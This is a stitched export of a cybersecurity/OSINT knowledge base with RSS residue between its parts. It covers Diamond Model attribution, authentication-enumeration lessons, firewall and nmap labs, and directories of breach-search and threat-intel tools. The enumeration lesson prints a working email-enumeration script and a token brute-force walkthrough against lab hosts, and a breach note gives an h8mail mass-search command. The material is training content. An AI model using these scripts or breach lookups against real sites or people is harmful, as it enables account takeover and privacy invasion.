Finally, we can attribute the victims component of the Diamond Model using a combination of the Target list and any associated Operations. Threat actors who are affiliated with nation states often have an objective that is different than those of non nation-state actors. The main differentiator here is that nation-state threat actors display advanced persistence and are not directly motivated by financial gain — rather, they conduct their operations over a long period of time to extract intelligence in support of larger objectives. Therefore, any targets and operations should be looked at more closely to determine who the victim ultimately is. In our example, we see that several targets and one operation are listed in the Methods, Targets, and Operations section of the Intelligence Card™.
Although some of the targets include technologies and products, a close examination of the operation “Operation Manul” reveals that journalists, lawyers, activists, and government institutions were targeted. Therefore, it makes sense that the threat actor targeted physical devices and products as a means to compromise those victims.

tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/recorded-future-cti-guide.htmlProjects/cti/recorded-future-cti-guide.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://cms.recordedfuture.com/uploads/seven_reasons_why_cyber_threat_intelligence_important_1541a67df8.jpg"></figure>plantilla-personal-information-target-file al cuantificar el esfuerzo de correlación
Base teórica para herramientas como spiderfoot-correlations que automatizan la búsqueda de conexiones Teoría de combinatoria básica aplicada a OSINT Concepto desarrollado internamente para metodología de investigación
tema-cti-articulos-y-casos-de-estudio ]]>projects/doctrina/formula-combinatoria-convergencia-osint.htmlProjects/doctrina/formula-combinatoria-convergencia-osint.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/doctrina/otan-uint-operational-playbook.htmlProjects/doctrina/otan-uint-operational-playbook.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/doctrina/otan-uint-plan-accion-operativo.htmlProjects/doctrina/otan-uint-plan-accion-operativo.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/doctrina/programa-academico-analista-inteligencia.htmlProjects/doctrina/programa-academico-analista-inteligencia.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/techint/application-security-software-lifecycle.htmlProjects/techint/application-security-software-lifecycle.mdTue, 28 Apr 2026 14:35:56 GMTCustom BloodHound Queries for Active Directory - 8com Blog Autor: Robin Meier (8com), 28.01.2025
Lab environment: GOAD - Orange Cyberdefense Herramientas referenciadas:
printerbug (krbrelayx)
ntlmrelayx (Impacket)
pywhisker
Misconfiguration-Manager ELEVATE-1
tema-cti-articulos-y-casos-de-estudio ]]>projects/techint/bloodhound-active-directory-queries.htmlProjects/techint/bloodhound-active-directory-queries.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/techint/docker-analysis.htmlProjects/techint/docker-analysis.mdTue, 28 Apr 2026 14:35:56 GMTThink of yourself as a digital detective. It's not just about picking up clues—it's about understanding what these clues reveal about the security of a system. This is essentially what authentication enumeration involves. It's like piecing together a puzzle rather than just ticking off items on a checklist.Authentication enumeration is like peeling back the layers of an onion. You remove each layer of a system's security to reveal the real operations underneath. It's not just about routine checks; it's about seeing how everything is connected.Identifying Valid UsernamesKnowing a valid username lets an attacker focus just on the password. You can figure out usernames in different ways, like observing how the application responds during login or password resets. For example, error messages that specify "this account doesn't exist" or "incorrect password" can hint at valid usernames, making an attacker's job easier.Password PoliciesThe guidelines when creating passwords can provide valuable insights into the complexity of the passwords used in an application. By understanding these policies, an attacker can gauge the potential complexity of the passwords and tailor their strategy accordingly. For example, the below PHP code uses regex to require a password that includes symbols, numbers, and uppercase letters:<?php $password = $_POST['pass']; // Example1 $pattern = '/^(?=.*[A-Z])(?=.*\d)(?=.*[\W_]).+$/'; if (preg_match($pattern, $password)) { echo "Password is valid."; } else { echo "Password is invalid. It must contain at least one uppercase letter, one number, and one symbol."; } ?> In the above example, if the supplied password doesn't satisfy the policy defined in the pattern variable, the application will return an error message revealing the regex code requirement. An attacker might generate a dictionary that satisfies this policy.Web applications are full of features that make things easier for users but can also expose them to risks:Registration PagesWeb applications typically make the user registration process straightforward and informative by immediately indicating whether an email or username is available. While this feedback is designed to enhance user experience, it can inadvertently serve a dual purpose. If a registration attempt results in a message stating that a username or email is already taken, the application is unwittingly confirming its existence to anyone trying to register. Attackers exploit this feature by testing potential usernames or emails, thus compiling a list of active users without needing direct access to the underlying database.Password Reset FeaturesPassword reset mechanisms are designed to help users regain access to their accounts by entering their details to receive reset instructions. However, the differences in the application's response can unintentionally reveal sensitive information. For example, variations in an application's feedback about whether a username exists can help attackers verify user identities. By analyzing these responses, attackers can refine their lists of valid usernames, substantially improving the effectiveness of subsequent attacks.Verbose ErrorsVerbose error messages during login attempts or other interactive processes can reveal too much. When these messages differentiate between "username not found" and "incorrect password," they're intended to help users understand their login issues. However, they also provide attackers with definitive clues about valid usernames, which can be exploited for more targeted attacks.Data Breach InformationData from previous security breaches is a goldmine for attackers as it allows them to test whether compromised usernames and passwords are reused across different platforms. If an attacker finds a match, it suggests not only that the username is reused but also potential password recycling, especially if the platform has been breached before. This technique demonstrates how the effects of a single data breach can ripple through multiple platforms, exploiting the connections between various online identities.
Imagine you're a detective with a knack for spotting clues that others might overlook. In the world of web development, verbose errors are like unintentional whispers of a system, revealing secrets meant to be kept hidden. These detailed error messages are invaluable during the debugging process, helping developers understand exactly what went wrong. However, just like an overheard conversation might reveal too much, these verbose errors can unintentionally expose sensitive data to those who know how to listen.Verbose errors can turn into a goldmine of information, providing insights such as: Internal Paths: Like a map leading to hidden treasure, these reveal the file paths and directory structures of the application server which might contain configuration files or secret keys that aren't visible to a normal user. Database Details: Offering a sneak peek into the database, these errors might spill secrets like table names and column details. User Information: Sometimes, these errors can even hint at usernames or other personal data, providing clues that are crucial for further investigation. Attackers induce verbose errors as a way to force the application to reveal its secrets. Below are some common techniques used to provoke these errors: Invalid Login Attempts: This is like knocking on every door to see which one will open. By intentionally entering incorrect usernames or passwords, attackers can trigger error messages that help distinguish between valid and invalid usernames. For example, entering a username that doesn’t exist might trigger a different error message than entering one that does, revealing which usernames are active. SQL Injection: This technique involves slipping malicious SQL commands into entry fields, hoping the system will stumble and reveal information about its database structure. For example, placing a single quote ( ') in a login field might cause the database to throw an error, inadvertently exposing details about its schema. File Inclusion/Path Traversal: By manipulating file paths, attackers can attempt to access restricted files, coaxing the system into errors that reveal internal paths. For example, using directory traversal sequences like ../../ could lead to errors that disclose restricted file paths. Form Manipulation: Tweaking form fields or parameters can trick the application into displaying errors that disclose backend logic or sensitive user information. For example, altering hidden form fields to trigger validation errors might reveal insights into the expected data format or structure. Application Fuzzing: Sending unexpected inputs to various parts of the application to see how it reacts can help identify weak points. For example, tools like Burp Suite Intruder are used to automate the process, bombarding the application with varied payloads to see which ones provoke informative errors. When it comes to breaching authentication, enumeration and brute forcing often go hand in hand: User Enumeration: Discovering valid usernames sets the stage, reducing the guesswork in subsequent brute-force attacks. Exploiting Verbose Errors: The insights gained from these errors can illuminate aspects like password policies and account lockout mechanisms, paving the way for more effective brute-force strategies. In summary, verbose errors are like breadcrumbs leading attackers deeper into the system, providing them with the insights needed to tailor their strategies and potentially compromise security in ways that could go undetected until it’s too late.
In this HackerOne report, the attacker was able to enumerate users using the website's Forget Password function. Similarly, we can also enumerate emails in login forms. For example, navigate to http://enum.thm/labs/verbose_login/ and put any email address in the Email input field.When you input an invalid email, the website will respond with "Email does not exist." indicating that the email has not been registered yet.
However, if the email is already registered, the website will respond with an "Invalid password" error message, indicating that the email exists in the database but the password is incorrect.
Below is a Python script that will check for valid emails in the target web app. Save the code below as script.py.import requests import sys def check_email(email): url = 'http://enum.thm/labs/verbose_login/functions.php' # Location of the login function headers = { 'Host': 'enum.thm', 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin': 'http://enum.thm', 'Connection': 'close', 'Referer': 'http://enum.thm/labs/verbose_login/', } data = { 'username': email, 'password': 'password', # Use a random password as we are only checking the email 'function': 'login' } response = requests.post(url, headers=headers, data=data) return response.json() def enumerate_emails(email_file): valid_emails = [] invalid_error = "Email does not exist" # Error message for invalid emails with open(email_file, 'r') as file: emails = file.readlines() for email in emails: email = email.strip() # Remove any leading/trailing whitespace if email: response_json = check_email(email) if response_json['status'] == 'error' and invalid_error in response_json['message']: print(f"[INVALID] {email}") else: print(f"[VALID] {email}") valid_emails.append(email) return valid_emails if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 script.py <email_list_file>") sys.exit(1) email_file = sys.argv[1] valid_emails = enumerate_emails(email_file) print("\nValid emails found:") for valid_email in valid_emails: print(valid_email) Click here for a breakdown of the script.
We can use a common list of emails from this repository.
Once you've downloaded the payload list, use the script on the AttackBox or your own machine to check for valid email addresses.Note: As a reminder, we strongly advise using the AttackBox for this task.script.pyuser@tryhackme $ python3 script.py usernames_gmail.com.txt [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [INVALID] xxxxxx@gmail.com [VALID] xxxxxx@gmail.com Password reset mechanism is an important part of user convenience in modern web applications. However, their implementation requires careful security considerations because poorly secured password reset processes can be easily exploited.Email-Based ResetWhen a user resets their password, the application sends an email containing a reset link or a token to the user’s registered email address. The user then clicks on this link, which directs them to a page where they can enter a new password and confirm it, or a system will automatically generate a new password for the user. This method relies heavily on the security of the user's email account and the secrecy of the link or token sent.Security Question-Based ResetThis involves the user answering a series of pre-configured security questions they had set up when creating their account. If the answers are correct, the system allows the user to proceed with resetting their password. While this method adds a layer of security by requiring information only the user should know, it can be compromised if an attacker gains access to personally identifiable information (PII), which can sometimes be easily found or guessed.SMS-Based ResetThis functions similarly to email-based reset but uses SMS to deliver a reset code or link directly to the user’s mobile phone. Once the user receives the code, they can enter it on the provided webpage to access the password reset functionality. This method assumes that access to the user's phone is secure, but it can be vulnerable to SIM swapping attacks or intercepts.Each of these methods has its vulnerabilities: Predictable Tokens: If the reset tokens used in links or SMS messages are predictable or follow a sequential pattern, attackers might guess or brute-force their way to generate valid reset URLs. Token Expiration Issues: Tokens that remain valid for too long or do not expire immediately after use provide a window of opportunity for attackers. It’s crucial that tokens expire swiftly to limit this window. Insufficient Validation: The mechanisms for verifying a user’s identity, like security questions or email-based authentication, might be weak and susceptible to exploitation if the questions are too common or the email account is compromised. Information Disclosure: Any error message that specifies whether an email address or username is registered can inadvertently help attackers in their enumeration efforts, confirming the existence of accounts. Insecure Transport: The transmission of reset links or tokens over non-HTTPS connections can expose these critical elements to interception by network eavesdroppers. Tokens that are simple, predictable, or have long expiration times can be particularly vulnerable to interception or brute force. For example, the below code is used by the vulnerable application hosted in the Predictable Tokens lab:$token = mt_rand(100, 200); $query = $conn->prepare("UPDATE users SET reset_token = ? WHERE email = ?"); $query->bind_param("ss", $token, $email); $query->execute(); The code above sets a random three-digit PIN as the reset token of the submitted email. Since this token doesn't employ mixed characters, it can be easily brute-forced.
To demonstrate this, go to http://enum.thm/labs/predictable_tokens/.

Navigate to the application's password reset page, input "admin@admin.com" in the Email input field, and click Submit.
The application will respond with a success message.
For demonstration purposes, the web application uses the reset link: http://enum.thm/labs/predictable_tokens/reset_password.php?token=123
Notice the token is a simple numeric value. Using Burp Suite, navigate to the above URL and capture the request.Subsequently, send the request to the Intruder, highlight the value of the token parameter, and click the Add payload button, as shown below.
Using the AttackBox or your own attacking VM, use Crunch to generate a list of numbers from 100 to 200. This list will be used as the dictionary in the brute-force attack.Using Crunchuser@tryhackme $ crunch 3 3 -o otp.txt -t %%% -s 100 -e 200 Crunch will now generate the following amount of data: 404 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 101 crunch: 100% completed generating output Go back to Intruder and configure the payload to use the generated file.

The attack will take some time to finish if you're using Burp Suite Community Edition. However, once successful, you will get a response with a much bigger content length compared to the responses with an "Invalid token" error message.
Log in to the application using the new password.
Note that most web applications use a 6-digit code instead of three. We are using a lower value in this demo because we are using the Community version of Burp Suite.
tema-cti-articulos-y-casos-de-estudio ]]>projects/techint/estudio-enumeracion-vulnerabilidades-auth.htmlProjects/techint/estudio-enumeracion-vulnerabilidades-auth.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/645b19f5d5848d004ab9c9e2/room-content/645b19f5d5848d004ab9c9e2-1719928726091.png"></figure>
To create a new rule, select Outbound Rules then New Rule on the right-hand side of the window. This will launch a new window labeled Rule Type
Note that we have 4 rule creation options - rules for a port, program, customized rule or predefined rule. For the purpose of this lab, we will create port rules. Select the Port radio button and click Next.
On the Protocol and Port screen, ensure the TCP radio button is selected. On the lower-half of the screen, select Specific remote ports. Enter 443 as the port number. This is the HTTPS port. Click Next. Now we need to decide the action to take when this rule is met. Select Allow the connection. Click Next.
Leave the defaults on the Profile page (apply the rule to all 3 profiles) and click Next. Name the rule HTTPS Access. Leave the description field blank. Click Finish.
Locate and double-click our HTTPS Access rule to launch its specific properties. Click on each tab to view the details.  
Switch to the Kali Linux 2020.3 SOURCE VM. Login as kali with the password Passw0rd!
Open a Terminal by clicking the Terminal icon in the upper-left corner.
The ip command in Linux is used to show or change our routing configurations, network devices and interfaces. View the commands manual page to learn more about this command by running man ip Press q when you're fininshed to exit the manual page.
Check your IP address by executing ip addr Note the eth0 IP address on Kali Source is 192.168.1.8/24
Now switch to the Kali Linux 2020.3 DESTINATION VM. Login as kali with the password Passw0rd!
Open a Terminal and execute ip addr This will show you the IP address on Kali Destination is 192.168.1.25/24
From the Destination VM, ping the Source VM 5 times by using the -c option (short for "count"). You should see replies. ping 192.168.1.8 -c 5
Switch back to the Kali Linux 2020.3 SOURCE VM. Send 5 pings to the Destination VM. ping 192.168.1.25 -c 5 Now that we've ensured our two machines can communicate, let's learn more about IPTables. Execute man iptables and read through the manual.
In the Source machine, display the current firewall rule settings by executing sudo iptables -L and entering the sudo password Passw0rd! Recall from the manual that the -L option is short for "list", and will list all of our rules. Note that the current rule is set to accept all policies to the Dstination address. In other words, no rules are established - it is displaying the default configuration policies; INPUT, FORWARD, and OUTPUT chain. The INPUT chain is used for incoming connections. The FORWARD chain is used for incoming connections that are not destined for the device itself. This chain is rarely used on a client machine. The OUTPUT chain is used for outgoing connections. The INPUT policies will be the focus of this exercise as we will work the block traffic flow from the source to Destination VM. We will now go through 4 different scenarios to create policies on the Source VM and attempt to communicate with the Destination VM. Scenario A: Create a rule to block the Source Machine from communicating with the Destination address.
To suffice the scenario, enter the following rule: sudo iptables -A INPUT -s 192.168.1.25 -j DROP This rules specifies that any packets coming from the IP address 192.168.1.25 sould be dropped. The -A option tells IPTables to append the rule to the specified chain, which is the INPUT chain. The -j tells IPTables which action to take when the rule is met, which in this scenario is to drop the packet.
Make sure the rule was created by executing sudo iptables -L You should see a DROP entry for all protocols with a source of 192.168.1.25.
Attempt to communicate with the Destination VM by running ping 192.168.1.25 -c 5 You should not recieve any replies from the Destination VM - packet loss should be 100%.
Scenario B: Modify the default chain FORWARD setting to change Accept to Drop. To accomplish this, type sudo iptables -P FORWARD DROP and press Enter. Then run sudo iptables -L to verify it worked. Try sending a ping to the Destination VM with ping 192.168.1.25 -c 5 Note that the Source VM still cannot communicate with the Destination VM.
Scenario C: Enable port 22 (SSH), port 80 (HTTP), and port 443 (HTTPS) for the purposes of connectivity from the Source VM to the Destination VM in the firewall ruleset. To suffice these conditions we will have to create three separate rules - one for each port. We will also be using the -I option (uppercase i) to add them at the top of the rule chain. Create the first rule by executing sudo iptables -I INPUT -p tcp --dport 22 -j ACCEPT
Now create the rules for HTTP/HTTPS: sudo iptables -I INPUT -p tcp --dport 80 -j ACCEPT sudo iptables -I INPUT -p tcp --dport 443 -j ACCEPT
Verify the rules were create by executing sudo iptables -L -n Note that ports 22, 80 and 443 have been augmented to the ruleset.
Switch back to the Kali Linux 2020.3 DESTINATION VM. If our rules are working, we shouldn't be able to send pings to the Source VM, but we should be able to connect via SSH due to the SSH rule we created. First, trying sending pings to the Source VM with ping 192.168.1.8 -c 5
Then, attempt connecting to the VM via SSH with ssh kali@192.168.1.8 We are asked if we want to continue connecting, indicating our packets weren't rejected by the Source VM. Type yes and press Enter. Enter the password Passw0rd! Note we were able to SSH into the Source VM. Verify this by running ip addr - you will notice we are returned the Source VM's IP, since we are logged into it. Type exit then press Enter to close the connection, then switch back to the Kali Linux 2020.3 SOURCE Scenario D: Remove firewall rules from the IPTables configuration. To do this, we will use the -D option.
In your terminal, delete the rules by executing: sudo iptables -D INPUT 4 sudo iptables -D INPUT 3 sudo iptables -D INPUT 2 sudo iptables -D INPUT 1
Verify the rules have been deleted with sudo iptables -L Ping the Destination VM with ping 192.168.1.25 -c 5. Note that we can now communicate with it. Make sure to close your terminal window prior to submitting for your grade. Click Submit to grade and exit the lab.
tema-cti-articulos-y-casos-de-estudio ]]>projects/techint/itca-windows-linux-firewalls.htmlProjects/techint/itca-windows-linux-firewalls.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://labondemand.blob.core.windows.net/content/lab81043/giruvdf9.jpg"></figure>tema-cti-articulos-y-casos-de-estudio ]]>projects/techint/network-security-study-guide.htmlProjects/techint/network-security-study-guide.mdTue, 28 Apr 2026 14:35:56 GMT
Now, let's figure out our gateway. Type ip route We can see that our gateway is 192.168.1.1 In the next step, we will use nmap to map out our network. Learn more about nmap by executing man nmap to view its manual. Press q when you're done reading.
To simply view what hosts are up on the network, type nmap -sn 192.168.1.0/24 The -sn option is used to run a ping scan. Two hosts, including our Kali machine, are up on this LAN segment. Let's find out more information.
By default, nmap launches a SYN scan. Let's do this by typing nmap 192.168.1.0/24 This scan still shows us that two hosts are up, but gives us more information as well.
From our SYN scan, we can see that 192.168.1.23 is running SSH on port 22. Let's dig deeper on this host by typing nmap -sV 192.168.1.23 The -sv option will probe open ports on the network to determine service and version information. We can now see that 192.168.1.23 is an Ubuntu Linux system running OpenSSH specifically.
Now that we know that OpenSSH server is running on 192.168.1.23, let's use it to remotely log in to the system. Type ssh packethunter@192.168.1.23 and type yes when asked if you want to continue connecting. Use the password packethunters when prompted. We can see that we are remotely logged in to the Ubuntu system by the command prompt changing to packethunter@Corp-Backup Type uname -a The nmap scan was indeed correct due to the fact that this is an Ubuntu Linux system.
Type whoami to ensure that we are indeed using the packethunter account. Type sudo su to log in to the root account of this system. Use the password packethunters again. We are now controlling the system as the root user. Note that we are in to the same directory as before, but with the root user as opposed to the packethunter user. Confirm this by running whoami
Type ip addr to check for interfaces on this machine. Other than our already-known IP of 192.168.1.23 and loopback, there are no other network interfaces on this system. Feel free to continue navigating around this machine.
Type exit to go back in to the packethunter account. Type exit to cancel the SSH connection. Type exit to close Kali's terminal window. Click Submit to grade and exit the lab.
tema-cti-articulos-y-casos-de-estudio ]]>projects/techint/scanning-ports-ssh.htmlProjects/techint/scanning-ports-ssh.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://labondemand.blob.core.windows.net/content/lab81385/zeoe022g.jpg"></figure>tema-report-writing-cti ]]>projects/compliance/reporte-ejemplo-compliance-2.htmlProjects/compliance/reporte-ejemplo-compliance-2.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>projects/compliance/reporte-ejemplo-compliance-doc-1.htmlProjects/compliance/reporte-ejemplo-compliance-doc-1.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Folder /templates/ in your repo. Mandatory YAML front-matter: # Executive Summary (5 lines) # Primary Sources - URL | date | capture hash # Chronology - 2024-10-01: Domain registration - 2025-01-15: First leak # Annexes - Screenshots folder `/annexes/` - CSV extracts
tema-report-writing-cti ]]>projects/cti/report-templates-bible.htmlProjects/cti/report-templates-bible.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>projects/cti/reporte-ejemplo-cti-1.htmlProjects/cti/reporte-ejemplo-cti-1.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>projects/cti/reporte-ejemplo-cti-2.htmlProjects/cti/reporte-ejemplo-cti-2.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search engines that can be used to check if your data's been breached
CredenShow - Identify your compromised credentials before others do.
HIB Ransomed - Because people have the right to know if their data has been leaked.
HEROIC.NOW - Has your data been leaked on the dark web? Scan your identities for FREE.
IKnowYour.Dad - Data Breach Search Engine.
Leaker - Passive leak enumeration CLI tool that searches across 10 breach databases simultaneously.
StealSeek - Powerful search engine designed to help you find and analyze data breaches.
Venacus - Search for your data breaches and get notified when your data is compromised.
Fuente complementaria del master osint-references-master. Alternatives and complements to HIBP:Quick command:# h8mail - mass search h8mail -t targets.txt -bc local_breach_folder/ --power-all Importado desde Inbox/DATOS COMPROMETIDOS.md durante consolidacion bulk. Recursos especializados para la busqueda de datos comprometidos publicados en sitios de paste, foros underground y la dark web. Incluye motores de busqueda personalizados, indices de foros historicos y servicios de busqueda en filtraciones.Datos filtrados / Busqueda en pastes / Foros underground. Verificar si credenciales de una organizacion han sido filtradas Buscar datos comprometidos en operaciones de cibervigilancia
Cruzar datos con data-breach-search-engines para confirmar filtraciones
Parte del flujo de opsec-network-transport-security RaidForums fue cerrado por el FBI pero el indice historico sigue siendo referencia Snusbase permite buscar por email, username, IP, nombre y telefono
Ver data-breach-search-engines para plataformas adicionales de busqueda de filtraciones
Ver threat-actor-search para el directorio completo de foros underground Importado desde Inbox/Data Leaks.md durante consolidacion bulk. Plataformas principales para busqueda y verificacion de datos filtrados. Permiten buscar credenciales comprometidas, datos personales expuestos y pastes con informacion sensible.Filtraciones de datos / Busqueda de credenciales / Data breach search. Verificar exposicion de credenciales de una organizacion Buscar datos personales en filtraciones conocidas Monitoreo continuo de pastes para deteccion temprana
Parte del flujo de investigacion de domain-ip-research y domain-ip-research IntelX es la plataforma mas completa - incluye datos historicos Dehashed permite busquedas por multiples campos
Ver data-breach-search-engines para recursos adicionales
Ver pastebins para sitios de paste monitorizados Importado desde Inbox/Exploit Markets.md durante consolidacion bulk. Directorio curado de bases de datos de exploits y vulnerabilidades. Incluye mercados underground, repositorios publicos, bases de datos nacionales de vulnerabilidades y canales de Telegram de servicios de exploit.Bases de datos de exploits / Mercados de vulnerabilidades / Threat Intelligence. Buscar exploits publicos para un CVE especifico Monitorizar la aparicion de exploits in the wild Investigar PoCs disponibles para vulnerabilidades conocidas Correlacionar exploits con campanas de actores de amenazas Exploit-DB y Sploitus son los mas completos para busqueda de exploits In The Wild monitoriza exploits activamente explotados Rapid7 lista los modulos de Metasploit disponibles
Ver threat-actor-search para mercados underground
Ver threat-actor-search para foros donde se discuten exploits Importado desde Inbox/PHISHING SITES.md durante consolidacion bulk. Catalogo de herramientas especializadas en deteccion, analisis y bases de datos de sitios de phishing. Permiten verificar si una URL es maliciosa, consultar bases de datos de phishing conocido y acceder a repositorios de kits de phishing.Deteccion de phishing / Verificacion de URLs / Bases de datos de amenazas. Verificar si una URL reportada es phishing antes de bloquearla Consultar bases de datos de phishing conocido para correlacion de IOCs Acceder a kits de phishing para analisis de TTPs Generar listas de bloqueo para proteccion perimetral PhishTank y OpenPhish son las fuentes mas establecidas del sector urlscan.io proporciona screenshots y analisis detallado del comportamiento
Ver web-history-capture para herramientas generales de analisis de URLs
Ver threat-intelligence-feeds para listas de bloqueo adicionales
tema-ransomware-actores-y-respuesta ]]>projects/cti/data-breach-search-engines.htmlProjects/cti/data-breach-search-engines.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Threat Actor Usernames Scrape - A collection of fresh intel and 350k+ threat actor usernames scraped from various cybercrime sources & forums.
GitGuardian - Public GitHub Monitoring - Monitor public GitHub repositories in real time. Detect secrets and sensitive information to prevent hackers from using GitHub as a backdoor to your business.
OnionScan - Free and open source tool for investigating the Dark Web. Its main goal is to help researchers and investigators monitor and track Dark Web sites.
onion-lookup - Free online service and API for checking the existence of Tor hidden services (.onion address) and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata.
OTX AlienVault - Open Threat Exchange is the neighborhood watch of the global intelligence community. It enables private companies, independent security researchers, and government agencies to openly collaborate and share the latest information about emerging threats, attack methods, and malicious actors, promoting greater security across the entire community.
Pharos AI - Real-time open-source intelligence dashboard for conflict tracking with interactive geospatial visualization, multi-source RSS monitoring, and actor dossiers.
PhishingSecLists - This list is to be used with web scanning tools (Gobuster, ffuf, Burp Suite, DirBuster). These lists are specifically tailored and designed for fuzzing phishing, crypto scam landing pages, and other malicious sketch af websites. You can gain vaulable intel on successful hits.
REScure Threat Intel Feed - REScure is an independent threat intelligence project which we undertook to enhance our understanding of distributed systems, their integration, the nature of threat intelligence and how to efficiently collect, store, consume, distribute it.
STIX Viewer - An online free STIX 2.1 viewer / visualizer. Importado desde Inbox/Blacklist-Blocklist.md durante consolidacion bulk. Catalogo completo de herramientas para verificacion de reputacion de IPs y URLs, deteccion de phishing y consulta de listas negras. Incluye bases de datos de IPs maliciosas, verificadores de URLs de phishing y herramientas de analisis de reputacion.Reputacion IP / Deteccion de phishing / Listas negras. Verificar reputacion de IPs en investigaciones de incidentes Detectar y catalogar campanas de phishing activas Alimentar listas de bloqueo en infraestructura de seguridad
Parte del flujo de investigacion de domain-ip-research AbuseIPDB y urlscan.io son los mas completos para uso diario PhishTank tiene API publica para automatizacion
Herramientas compartidas con data-breach-search-engines y web-history-capture Importado desde Inbox/CERT's y Organismos Publicos.md durante consolidacion bulk. Directorio de fuentes oficiales de ciberseguridad de organismos publicos. Incluye CERTs nacionales espanoles (CCN-CERT, INCIBE) y la agencia estadounidense CISA, con enlaces directos a sus secciones de informes, blogs y alertas.Fuentes oficiales / CERTs / Organismos gubernamentales de ciberseguridad. Seguimiento de alertas oficiales de ciberseguridad Fuente primaria para reportes de vulnerabilidades Referencia para alertas de ransomware (CISA StopRansomware)
Complemento a los osint-blogs de proveedores privados CCN-CERT es la referencia para administracion publica espanola INCIBE es la referencia para empresas y ciudadanos en Espana
Ver social-media-tools para las cuentas oficiales de estos organismos
Ver osint-blogs para proveedores CTI privados Importado desde Inbox/Coleccion de IOC's.md durante consolidacion bulk. Directorio de las 4 plataformas principales para la coleccion y consulta de Indicadores de Compromiso (IOCs). Incluye valoracion de utilidad mediante estrellas y enlaces directos a cada plataforma.Plataformas de coleccion de IOCs: hashes, IPs, dominios, URLs maliciosas. Busqueda rapida de IOCs especificos (hashes, IPs, dominios) Enriquecimiento de alertas del SOC con contexto de amenazas Validacion cruzada de indicadores entre multiples plataformas Alimentacion de reglas de deteccion en SIEM/EDR AlienVault OTX y Maltiverse destacan como las mas utiles (rating 3/3) Se recomienda consultar al menos 2 plataformas para confirmar un IOC
Complementar con threat-actor-search para analisis dinamico de muestras Importado desde Inbox/Indicadores de Compromiso.md durante consolidacion bulk. Nota indice que organiza los recursos de Indicadores de Compromiso (IOCs) por categoria de indicador. Sirve como punto de entrada al ecosistema de herramientas de investigacion de IOCs dentro del cheatsheet CTI-OSINT.Indice de recursos de IOCs: hashes, colecciones, IPs, dominios, URLs, sandboxes. Punto de partida para investigacion de IOCs en incidentes de seguridad Navegacion rapida a herramientas especializadas por tipo de indicador Referencia durante procesos de triage y respuesta a incidentes
Este indice forma parte de la estructura principal del cti-osint-cheatsheet Cada categoria enlaza a una nota dedicada con herramientas especificas
La categoria mas completa es threat-intelligence-feeds con 4 plataformas evaluadas Importado desde Inbox/Informes.md durante consolidacion bulk. Directorio de 12 proveedores principales de inteligencia de amenazas con enlaces directos a sus portales y blogs de investigacion. Fuentes de referencia para reportes de amenazas, analisis de campañas y inteligencia accionable.Proveedores de inteligencia de amenazas: blogs, portales de investigacion y reportes. Seguimiento diario de amenazas emergentes a traves de blogs de vendors Obtencion de reportes detallados de campañas y threat actors Correlacion de inteligencia entre multiples proveedores Alimentacion de briefs de inteligencia estrategica y tactica UNIT42 y Mandiant destacan por la profundidad de sus analisis de APTs Intel471 y Flashpoint son referencia para inteligencia del underground
Forma parte de la estructura de threat-intelligence-feeds Importado desde Inbox/Planes de Mitigacion.md durante consolidacion bulk. Directorio de 3 frameworks y herramientas clave para planes de mitigacion de amenazas. Incluye mitigaciones oficiales MITRE ATT&CK, mapeo de controles NIST/MITRE y una matriz de controles especifica para ransomware.Frameworks de mitigacion: controles, mapeos y matrices de respuesta. Identificar mitigaciones aplicables a tecnicas ATT&CK detectadas en un incidente Validar cobertura de controles existentes contra tecnicas de adversarios conocidos Diseñar planes de mitigacion especificos para amenazas de ransomware Mapear controles NIST contra tecnicas MITRE para evaluaciones de seguridad MITRE ATT&CK Mitigaciones es la referencia autoritativa para mapeo tecnica-mitigacion Control Validation Compass es ideal para gap analysis entre frameworks
